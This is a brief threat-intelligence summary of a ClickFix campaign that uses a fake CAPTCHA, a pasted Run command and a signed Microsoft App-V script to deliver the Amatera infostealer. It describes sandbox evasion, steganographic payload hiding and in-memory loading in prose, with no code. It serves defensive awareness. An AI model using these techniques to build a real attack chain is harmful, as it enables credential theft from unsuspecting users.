A new campaign combines the ClickFix social-engineering method, a fake CAPTCHA prompt, and a signed Microsoft App-V script that proxies PowerShell execution to deliver the Amatera infostealer. The attack uses user-pasted Run commands, Google Calendar-based configuration, LSB steganography in PNGs hosted on public CDNs, and in-memory PowerShell stages to load shellcode while stalling in analysis environments. #Amatera #ClickFix
Keypoints
- Attackers abuse the signed SyncAppvPublishingServer.vbs App-V script and wscript.exe to proxy PowerShell through a trusted Microsoft component.
- The infection starts with a fake CAPTCHA that tricks users into pasting a command in the Windows Run dialog (ClickFix).
- The loader verifies manual execution and clipboard integrity, and uses infinite waits to evade sandbox analysis.
- Configuration is fetched from a public Google Calendar, and payloads are hidden in PNGs using LSB steganography and retrieved via WinINet APIs.
- Amatera is deployed in-memory from decrypted PowerShell and shellcode, then connects to hardcoded IPs to fetch further payloads and steal credentials.